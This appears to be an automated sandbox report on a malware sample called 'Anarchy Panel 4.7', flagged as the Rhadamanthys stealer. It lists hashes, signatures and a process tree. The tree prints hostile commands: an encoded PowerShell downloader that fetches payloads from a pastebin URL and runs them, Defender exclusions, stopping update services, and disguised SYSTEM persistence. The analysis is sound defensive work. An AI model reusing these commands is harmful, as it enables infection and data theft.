Overview
overview
10Static
static
10Anarchy Pa...el.exe
windows7-x64
10Anarchy Pa...el.exe
windows10-2004-x64
10Anarchy Pa...xe.xml
windows7-x64
1Anarchy Pa...xe.xml
windows10-2004-x64
3Anarchy Pa...oG.dll
windows7-x64
1Anarchy Pa...oG.dll
windows10-2004-x64
1Anarchy Pa...uJ.dll
windows7-x64
1Anarchy Pa...uJ.dll
windows10-2004-x64
1Anarchy Pa...qM.dll
windows7-x64
1Anarchy Pa...qM.dll
windows10-2004-x64
1Anarchy Pa...LC.dll
windows7-x64
1Anarchy Pa...LC.dll
windows10-2004-x64
5Anarchy Pa...wp.dll
windows7-x64
1Anarchy Pa...wp.dll
windows10-2004-x64
1Anarchy Pa...uZ.dll
windows7-x64
1Anarchy Pa...uZ.dll
windows10-2004-x64
1Anarchy Pa...nG.dll
windows7-x64
1Anarchy Pa...nG.dll
windows10-2004-x64
1Anarchy Pa...TS.dll
windows7-x64
1Anarchy Pa...TS.dll
windows10-2004-x64
1Anarchy Pa...xj.dll
windows7-x64
1Anarchy Pa...xj.dll
windows10-2004-x64
1Anarchy Pa...pi.dll
windows7-x64
1Anarchy Pa...pi.dll
windows10-2004-x64
1Anarchy Pa...s4.dll
windows7-x64
1Anarchy Pa...s4.dll
windows10-2004-x64
1Anarchy Pa...Ya.dll
windows7-x64
1Anarchy Pa...Ya.dll
windows10-2004-x64
1Anarchy Pa...Jn.dll
windows7-x64
1Anarchy Pa...Jn.dll
windows10-2004-x64
1Anarchy Pa...GA.dll
windows7-x64
1Anarchy Pa...GA.dll
windows10-2004-x64
1Analysis
-
max time kernel
1800s -
max time network
1149s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
19-07-2023 00:36
Behavioral task
behavioral1
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
Anarchy Panel 4.7/Anarchy Panel.exe.xml
Resource
win7-20230712-en
Behavioral task
behavioral4
Sample
Anarchy Panel 4.7/Anarchy Panel.exe.xml
Resource
win10v2004-20230703-en
Behavioral task
behavioral5
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win7-20230712-en
Behavioral task
behavioral6
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral7
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win7-20230712-en
Behavioral task
behavioral8
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral9
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win7-20230712-en
Behavioral task
behavioral10
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral11
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win7-20230712-en
Behavioral task
behavioral12
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral13
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win7-20230712-en
Behavioral task
behavioral14
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral15
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win7-20230712-en
Behavioral task
behavioral16
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral17
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win7-20230712-en
Behavioral task
behavioral18
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral19
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win7-20230712-en
Behavioral task
behavioral20
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral21
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win7-20230712-en
Behavioral task
behavioral22
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral23
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win7-20230712-en
Behavioral task
behavioral24
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral25
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win7-20230712-en
Behavioral task
behavioral26
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral27
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win7-20230712-en
Behavioral task
behavioral28
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral29
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win7-20230712-en
Behavioral task
behavioral30
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral31
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win7-20230712-en
Behavioral task
behavioral32
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win10v2004-20230703-en
General
-
Target
Anarchy Panel 4.7/Anarchy Panel.exe
-
Size
72KB
-
MD5
462b459a2560b65a657cfecce53d682a
-
SHA1
f0ce24faf42d2d1453c4f18fda0223b83486e5ae
-
SHA256
00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db
-
SHA512
5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b
-
SSDEEP
384:5LerIjR+/cuFQ5r4NVX+oH38/1qmrc42mMPR45YHU/0/8IpzXePdCjiCNxKerWiV:nsUuFf
Malware Config
Extracted
https://pastebin.com/raw/p2s7tDSd
Signatures
-
Detect rhadamanthys stealer shellcode 6 IoCs
Processes:
resource yara_rule behavioral2/memory/448-217-0x0000000002230000-0x0000000002630000-memory.dmp family_rhadamanthys behavioral2/memory/448-218-0x0000000002230000-0x0000000002630000-memory.dmp family_rhadamanthys behavioral2/memory/448-221-0x0000000002230000-0x0000000002630000-memory.dmp family_rhadamanthys behavioral2/memory/448-223-0x0000000002230000-0x0000000002630000-memory.dmp family_rhadamanthys behavioral2/memory/448-286-0x0000000002230000-0x0000000002630000-memory.dmp family_rhadamanthys behavioral2/memory/448-319-0x0000000002230000-0x0000000002630000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
Processes:
aqcorpk2.zlc1.exeaqcorpk2.zlc2.exedescription pid process target process PID 4860 created 3156 4860 aqcorpk2.zlc1.exe Explorer.EXE PID 4860 created 3156 4860 aqcorpk2.zlc1.exe Explorer.EXE PID 4860 created 3156 4860 aqcorpk2.zlc1.exe Explorer.EXE PID 4860 created 3156 4860 aqcorpk2.zlc1.exe Explorer.EXE PID 4860 created 3156 4860 aqcorpk2.zlc1.exe Explorer.EXE PID 448 created 3156 448 aqcorpk2.zlc2.exe Explorer.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 19 4632 powershell.exe 21 4632 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
aqcorpk2.zlc1.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts aqcorpk2.zlc1.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Anarchy Panel.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation Anarchy Panel.exe -
Executes dropped EXE 4 IoCs
Processes:
aqcorpk2.zlc0.exeaqcorpk2.zlc1.exeaqcorpk2.zlc2.exeaqcorpk2.zlc3.exepid process 2240 aqcorpk2.zlc0.exe 4860 aqcorpk2.zlc1.exe 448 aqcorpk2.zlc2.exe 2376 aqcorpk2.zlc3.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
aqcorpk2.zlc0.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Software\Microsoft\Windows\CurrentVersion\Run aqcorpk2.zlc0.exe Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " aqcorpk2.zlc0.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
aqcorpk2.zlc1.exedescription pid process target process PID 4860 set thread context of 4456 4860 aqcorpk2.zlc1.exe dialer.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 3276 sc.exe 5004 sc.exe 3528 sc.exe 4164 sc.exe 4424 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 924 588 WerFault.exe winlogon.exe 1896 316 WerFault.exe dwm.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
powershell.exeaqcorpk2.zlc2.exeaqcorpk2.zlc1.exepowershell.exedialer.exepowershell.exepid process 4632 powershell.exe 4632 powershell.exe 448 aqcorpk2.zlc2.exe 448 aqcorpk2.zlc2.exe 4860 aqcorpk2.zlc1.exe 4860 aqcorpk2.zlc1.exe 2688 powershell.exe 2688 powershell.exe 4860 aqcorpk2.zlc1.exe 4860 aqcorpk2.zlc1.exe 4860 aqcorpk2.zlc1.exe 4860 aqcorpk2.zlc1.exe 4860 aqcorpk2.zlc1.exe 4860 aqcorpk2.zlc1.exe 4860 aqcorpk2.zlc1.exe 4860 aqcorpk2.zlc1.exe 4456 dialer.exe 4456 dialer.exe 4456 dialer.exe 4456 dialer.exe 2712 powershell.exe 4456 dialer.exe 4456 dialer.exe 448 aqcorpk2.zlc2.exe 448 aqcorpk2.zlc2.exe 2712 powershell.exe 2712 powershell.exe -
Suspicious behavior: LoadsDriver 64 IoCs
Processes:
pid process 4828 3644 4900 672 4488 2772 4988 2516 3876 3684 2804 4964 4868 2080 2564 1052 3944 260 464 4852 3896 2928 2692 336 3768 3892 4060 1340 5088 1172 4544 5052 2768 4976 2812 1404 4016 3128 1400 4412 3152 1188 1660 4936 1164 3476 4664 3560 4144 4356 3508 1760 1664 4416 3148 3732 4012 4896 4892 628 3032 4520 3616 2168 -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exepowershell.exedialer.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 4456 dialer.exe Token: SeShutdownPrivilege 1608 powercfg.exe Token: SeCreatePagefilePrivilege 1608 powercfg.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeShutdownPrivilege 2296 powercfg.exe Token: SeCreatePagefilePrivilege 2296 powercfg.exe Token: SeShutdownPrivilege 784 powercfg.exe Token: SeCreatePagefilePrivilege 784 powercfg.exe Token: SeShutdownPrivilege 3524 powercfg.exe Token: SeCreatePagefilePrivilege 3524 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Anarchy Panel.exepowershell.execmd.exeaqcorpk2.zlc1.execmd.exedialer.exelsass.exeaqcorpk2.zlc2.exedescription pid process target process PID 3220 wrote to memory of 4632 3220 Anarchy Panel.exe powershell.exe PID 3220 wrote to memory of 4632 3220 Anarchy Panel.exe powershell.exe PID 3220 wrote to memory of 4632 3220 Anarchy Panel.exe powershell.exe PID 4632 wrote to memory of 2240 4632 powershell.exe aqcorpk2.zlc0.exe PID 4632 wrote to memory of 2240 4632 powershell.exe aqcorpk2.zlc0.exe PID 4632 wrote to memory of 4860 4632 powershell.exe aqcorpk2.zlc1.exe PID 4632 wrote to memory of 4860 4632 powershell.exe aqcorpk2.zlc1.exe PID 4632 wrote to memory of 448 4632 powershell.exe aqcorpk2.zlc2.exe PID 4632 wrote to memory of 448 4632 powershell.exe aqcorpk2.zlc2.exe PID 4632 wrote to memory of 448 4632 powershell.exe aqcorpk2.zlc2.exe PID 4632 wrote to memory of 2376 4632 powershell.exe aqcorpk2.zlc3.exe PID 4632 wrote to memory of 2376 4632 powershell.exe aqcorpk2.zlc3.exe PID 4632 wrote to memory of 2376 4632 powershell.exe aqcorpk2.zlc3.exe PID 384 wrote to memory of 3276 384 cmd.exe sc.exe PID 384 wrote to memory of 3276 384 cmd.exe sc.exe PID 384 wrote to memory of 5004 384 cmd.exe sc.exe PID 384 wrote to memory of 5004 384 cmd.exe sc.exe PID 384 wrote to memory of 3528 384 cmd.exe sc.exe PID 384 wrote to memory of 3528 384 cmd.exe sc.exe PID 384 wrote to memory of 4164 384 cmd.exe sc.exe PID 384 wrote to memory of 4164 384 cmd.exe sc.exe PID 384 wrote to memory of 4424 384 cmd.exe sc.exe PID 384 wrote to memory of 4424 384 cmd.exe sc.exe PID 4860 wrote to memory of 4456 4860 aqcorpk2.zlc1.exe dialer.exe PID 5040 wrote to memory of 1608 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 1608 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 2296 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 2296 5040 cmd.exe powercfg.exe PID 4456 wrote to memory of 588 4456 dialer.exe winlogon.exe PID 4456 wrote to memory of 676 4456 dialer.exe lsass.exe PID 4456 wrote to memory of 952 4456 dialer.exe svchost.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 4456 wrote to memory of 316 4456 dialer.exe dwm.exe PID 4456 wrote to memory of 436 4456 dialer.exe svchost.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 448 wrote to memory of 872 448 aqcorpk2.zlc2.exe certreq.exe PID 448 wrote to memory of 872 448 aqcorpk2.zlc2.exe certreq.exe PID 448 wrote to memory of 872 448 aqcorpk2.zlc2.exe certreq.exe PID 4456 wrote to memory of 752 4456 dialer.exe svchost.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 448 wrote to memory of 872 448 aqcorpk2.zlc2.exe certreq.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 5040 wrote to memory of 784 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 784 5040 cmd.exe powercfg.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 4456 wrote to memory of 1064 4456 dialer.exe svchost.exe PID 4456 wrote to memory of 1092 4456 dialer.exe svchost.exe PID 5040 wrote to memory of 3524 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 3524 5040 cmd.exe powercfg.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 4456 wrote to memory of 1104 4456 dialer.exe svchost.exe PID 4456 wrote to memory of 1180 4456 dialer.exe svchost.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe PID 676 wrote to memory of 2432 676 lsass.exe sysmon.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:676
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 316 -s 38923⤵
- Program crash
PID:1896 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 588 -s 7642⤵
- Program crash
PID:924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1180
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2432
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe"4⤵
- Executes dropped EXE
PID:2376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3276 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5004 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3528 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4164 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4424 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:784 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3524 -
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712 -
C:\Windows\system32\certreq.exe"C:\Windows\system32\certreq.exe"2⤵PID:872
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 428 -p 588 -ip 5881⤵PID:4276
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 316 -ip 3161⤵PID:4960
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 316 -ip 3161⤵PID:4360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:1224
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4000
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4712
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2900
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:640
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3276
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4084
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
19KB
MD5bf5ac66a6a0b2e5a158d989669ea5202
SHA156eaeb9500ac19e9006c5f5cd96f6ad648e92612
SHA25670a48a9f41e18cb879549fc403fe7080aab5213506fd00bbd0b34ea3f68ac408
SHA5129732bd97c4a2984bed99b1dcb46c685eca1bcc5c88c92f7ba39998f468e00240ad3e8f65f11f5e477a2472bef0ab1080804e227c4dc177d36744b5e6a618d3e1
-
Filesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
91KB
MD517d1a593f7481f4a8cf29fb322d6f472
SHA1a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA5128c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849
-
Filesize
91KB
MD517d1a593f7481f4a8cf29fb322d6f472
SHA1a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA5128c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849
-
Filesize
91KB
MD517d1a593f7481f4a8cf29fb322d6f472
